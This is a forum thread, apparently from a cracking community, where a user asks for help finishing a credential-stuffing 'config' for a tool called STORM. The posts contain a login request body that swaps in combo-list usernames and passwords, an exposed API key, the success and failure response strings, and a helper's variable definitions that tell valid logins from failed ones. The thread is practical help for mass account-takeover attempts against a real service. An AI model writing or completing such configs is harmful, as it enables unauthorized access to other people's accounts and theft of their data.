Please help me to finish my first config with STORM

insan0us

Eminent Member
Member
Joined
Threads
71
Posts
192
Hello there

I am trying to make a config with this new awesome tool STORM. But for my lack of knowledge about this tool
I couldn't complete the config.
I can called the link and added header successfully but stuck in the post data variable
here is my post data:
Code:
{"api_key":"ZmOLNuJz0VBLh2pS3Ep6v1hv57DOuN4zuI7I4fGr","client":"Android-nullbnull","os":"22","password":"alibabagroup","username":"[email protected]","uuid":"2d757b1e-0015-4ff2-bb42-a2862531e159"}

I put this data in STORM as
Code:
"{"api_key":"ZmOLNuJz0VBLh2pS3Ep6v1hv57DOuN4zuI7I4fGr","client":"Android-nullbnull","os":"22","password":", $ComboPassword#","username":", $ComboUsername#","uuid":"2d757b1e-0015-4ff2-bb42-a2862531e159"}"

Here is what STORM execute when I run it in debug

srxHlhe.png


any help will be appreciated
 
1525134262-screenshot-1.png


Here is your data
Code:
{chr(double quotes)api_keychr(double quotes):chr(double quotes)ZmOLNuJz0VBLh2pS3Ep6v1hv57DOuN4zuI7I4fGrchr(double quotes)chr(Comma)chr(double quotes)clientchr(double quotes):chr(double quotes)Android-nullbnullchr(double quotes)chr(Comma)chr(double quotes)oschr(double quotes):chr(double quotes)22chr(double quotes)chr(Comma)chr(double quotes)passwordchr(double quotes):chr(double quotes)",$ComboPassword#,"chr(double quotes)chr(Comma)chr(double quotes)usernamechr(double quotes):chr(double quotes)",$ComboUsername#,"chr(double quotes)chr(Comma)chr(double quotes)uuidchr(double quotes):chr(double quotes)2d757b1e-0015-4ff2-bb42-a2862531e159chr(double quotes)}
 
  • Thread Starter Thread Starter
  • #4
1525134262-screenshot-1.png


Here is your data
Code:
{chr(double quotes)api_keychr(double quotes):chr(double quotes)ZmOLNuJz0VBLh2pS3Ep6v1hv57DOuN4zuI7I4fGrchr(double quotes)chr(Comma)chr(double quotes)clientchr(double quotes):chr(double quotes)Android-nullbnullchr(double quotes)chr(Comma)chr(double quotes)oschr(double quotes):chr(double quotes)22chr(double quotes)chr(Comma)chr(double quotes)passwordchr(double quotes):chr(double quotes)",$ComboPassword#,"chr(double quotes)chr(Comma)chr(double quotes)usernamechr(double quotes):chr(double quotes)",$ComboUsername#,"chr(double quotes)chr(Comma)chr(double quotes)uuidchr(double quotes):chr(double quotes)2d757b1e-0015-4ff2-bb42-a2862531e159chr(double quotes)}

Many thanks @m1st for quick reply but solved that problem with your video tut but got new problem in the SK and FK variable

here is my data of SK
{"access_expire_epoch":1525703644,"access_token":"ssssss","account_type":1,"auth":{"password":"sssss","username":"sssss"},"email":"[email protected]","refresh_token":"IWSdHKrNFNc4me1fSB5mV5lbjOvv9I","sub_end_epoch":1550275200}

FK
{"code":1100,"reason":"Email or password provided is incorrect"}


Now how do I call the data in STORM
 
SK access_token
FK Email or password provided is incorrect
 
I know this but how I call it in the tool I mean what command should i use? do i need to add double quote
Variable-4 = $Success = indexof($stage1responsesource#,"access_token")
Variable-5 = $Fail = indexof($stage1responsesource#,"Email or password provided is incorrect")
 
  • Thread Starter Thread Starter
  • #9
Variable-4 = $Success = indexof($stage1responsesource#,"access_token")
Variable-5 = $Fail = indexof($stage1responsesource#,"Email or password provided is incorrect")

Many thanks bro but still facing this error
hOClLsW.png